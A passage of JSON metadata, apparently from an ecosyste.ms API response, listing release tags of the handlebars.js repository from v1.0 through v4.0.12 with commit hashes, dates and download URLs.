b_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.5/manifests"},{"name":"v3.0.4","sha":"698c8a93a4066937977503d338bcd3b90d5035ca","kind":"tag","published_at":"2018-12-15T12:55:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.4/manifests"},{"name":"v4.0.12","sha":"8d22e6f501dc0720fe0610bb4dab60cae18e7d20","kind":"tag","published_at":"2018-09-04T18:44:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.12","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.12/manifests"},{"name":"v4.0.11","sha":"1e954ddf3c3ec6d2318e1fadc5e03aaf065b2fbd","kind":"tag","published_at":"2017-10-17T20:52:25.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.11","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.11/manifests"},{"name":"v4.0.10","sha":"670ec6fafbf99986a70074a37f73d41bad60b083","kind":"tag","published_at":"2017-05-21T12:11:27.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.10","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.10/manifests"},{"name":"v4.0.9","sha":"5ec78a8c70ac674f39a8408e04d59bd40340f6fe","kind":"tag","published_at":"2017-05-21T11:39:05.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.9","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.9/manifests"},{"name":"v4.0.8","sha":"fed5818876ec325b2b48a61395fe0089bdda05e8","kind":"commit","published_at":"2017-05-02T20:55:44.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.8/manifests"},{"name":"v4.0.7","sha":"606fa55b0a2fab4b22b810a21fc9ae1fd5fd8430","kind":"tag","published_at":"2017-04-29T20:52:09.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.7/manifests"},{"name":"tmp-1252-backup","sha":"ee913e28bd34dc6e97f98a99f00b484195f72d6f","kind":"commit","published_at":"2017-01-02T09:13:49.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/tmp-1252-backup","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/tmp-1252-backup","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@tmp-1252-backup","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/tmp-1252-backup","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/tmp-1252-backup/manifests"},{"name":"v4.0.6","sha":"ad3037cf54132fc5f589134d3bef961a5f751973","kind":"commit","published_at":"2016-11-12T18:32:45.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.6/manifests"},{"name":"v4.0.5","sha":"205c61cfb1acdb599bbdfcf2d356641254e09e5c","kind":"tag","published_at":"2015-11-20T05:06:54.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.5/manifests"},{"name":"v4.0.4","sha":"b7c95e9feb9b641af2fe83b23c3341ec624aae80","kind":"tag","published_at":"2015-10-29T06:54:17.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"9365b8290070f34bf797c836aed4335ce6a4094f","kind":"tag","published_at":"2015-09-24T03:41:14.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"a5a3ab01d3659b996234e3fa5a4a32350a145096","kind":"tag","published_at":"2015-09-04T14:13:16.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"c7b28a65dab1f1bb370f258fd65796d74c7b53cb","kind":"tag","published_at":"2015-09-03T02:21:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"bff5fab8f9d42e21950be00dcf1cedf4dc1a565b","kind":"tag","published_at":"2015-09-01T13:19:14.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.0/manifests"},{"name":"v3.0.3","sha":"891f48b7e9c321dd9cbe7a898533eb6b2434b8a0","kind":"tag","published_at":"2015-04-28T19:52:04.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.3/manifests"},{"name":"v3.0.2","sha":"2f0b86665f6080c065d67182ccfdca2ce6f243fa","kind":"tag","published_at":"2015-04-20T08:11:12.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.2/manifests"},{"name":"v3.0.1","sha":"afe730e0594440dd17fdc43271fc4a7db19327f3","kind":"tag","published_at":"2015-03-24T19:22:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.1/manifests"},{"name":"v3.0.0","sha":"0099e16a01bae4789c3560e2a658fdd7fecc9e12","kind":"tag","published_at":"2015-02-10T06:14:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.0/manifests"},{"name":"v2.0.0","sha":"1eb2b04aa1468059172af16968e28ba3a9c07e6d","kind":"tag","published_at":"2014-09-02T02:28:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0/manifests"},{"name":"v2.0.0-beta.1","sha":"cee52ea68f85baf6812cbc6d303595a88b4ea4f8","kind":"tag","published_at":"2014-08-26T23:32:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-beta.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v2.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-beta.1/manifests"},{"name":"v2.0.0-alpha.4","sha":"efad61b1b72a487c087f57ba85287f5682e57280","kind":"tag","published_at":"2014-05-20T04:15:51.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v2.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.4/manifests"},{"name":"v2.0.0-alpha.3","sha":"f419838362ad6f3a6f10179bcd7ca683d527e030","kind":"tag","published_at":"2014-05-20T03:29:25.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v2.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.3/manifests"},{"name":"v2.0.0-alpha.2","sha":"04c312649b0b9c61a245c4928f230935e9b8dd23","kind":"tag","published_at":"2014-03-06T07:26:26.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v2.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.2/manifests"},{"name":"v2.0.0-alpha.1","sha":"a5ff1f3d22178b3889983be29b31b850a4528719","kind":"tag","published_at":"2014-02-19T23:49:09.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v2.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.1/manifests"},{"name":"v1.3.0","sha":"0c6829f8af189622afd726bb72c195b5323bd6f9","kind":"tag","published_at":"2014-01-02T04:10:31.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.3.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"1c0614bd88b835b7cdfe1fb7f39650c18f645763","kind":"tag","published_at":"2013-12-26T22:25:42.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.2.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"096b8ccd2e376d621fd281e08d557a4632188aaa","kind":"tag","published_at":"2013-12-24T03:39:46.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.2.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.0/manifests"},{"name":"v1.1.2","sha":"47d13cb23c968ada3878b8bacf2813fb01758475","kind":"tag","published_at":"2013-11-06T00:10:06.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.1.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"09cdc19a21cd15059f1982f533bc65e2daae904d","kind":"tag","published_at":"2013-11-04T16:48:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.1.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"c53e95414f4e74bf6dfb2379a6b9b2468b8fcb31","kind":"tag","published_at":"2013-11-04T05:00:42.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.1.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.0/manifests"},{"name":"1.0.0","sha":"2a073e0993b40b81fbef82f681bb1dd171f2233b","kind":"tag","published_at":"2013-05-31T18:17:56.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0/manifests"},{"name":"v1.0.12","sha":"2a073e0993b40b81fbef82f681bb1dd171f2233b","kind":"tag","published_at":"2013-05-31T18:16:53.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.12","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.12/manifests"},{"name":"1.0.0-rc.4","sha":"4cf0410b7cc3e06f09b98bbc42a3d2df8e561eba","kind":"commit","published_at":"2013-05-14T04:09:21.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0-rc.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@1.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.4/manifests"},{"name":"v1.0.11","sha":"4cf0410b7cc3e06f09b98bbc42a3d2df8e561eba","kind":"tag","published_at":"2013-05-14T04:09:21.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.11","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.11/manifests"},{"name":"v1.0.7","sha":"b5074a88ec17917309f5482de004076f3f676ad1","kind":"tag","published_at":"2013-05-10T04:51:50.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.7/manifests"},{"name":"v1.0.10","sha":"948231a31d7d6786f1ea0a293a378b20928f6f2b","kind":"tag","published_at":"2013-02-27T13:52:34.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.10","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.10/manifests"},{"name":"v1.0.9","sha":"b74711e63b7bab7971cb1267f7f0bd9a60b525d7","kind":"tag","published_at":"2013-02-16T01:43:52.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.9","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.9/manifests"},{"name":"1.0.0-rc.3","sha":"bc8214cb7cb4b04180f4df33439ac61a92e1123f","kind":"commit","published_at":"2013-02-15T05:58:20.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0-rc.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@1.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.3/manifests"},{"name":"v1.0.8","sha":"5ac29dcb50cea15bee830304e391afd7375d56aa","kind":"tag","published_at":"2013-01-19T08:12:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.8/manifests"},{"name":"1.0.rc.2","sha":"9453c6d9d23f05c596123560ff9b5923e4eed954","kind":"commit","published_at":"2013-01-19T01:13:40.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.rc.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@1.0.rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.2/manifests"},{"name":"1.0.rc.1","sha":"ce74c36118ffed1779889d97e6a2a1028ae61510","kind":"commit","published_at":"2012-09-16T04:11:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.rc.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.rc.1","dependencies_p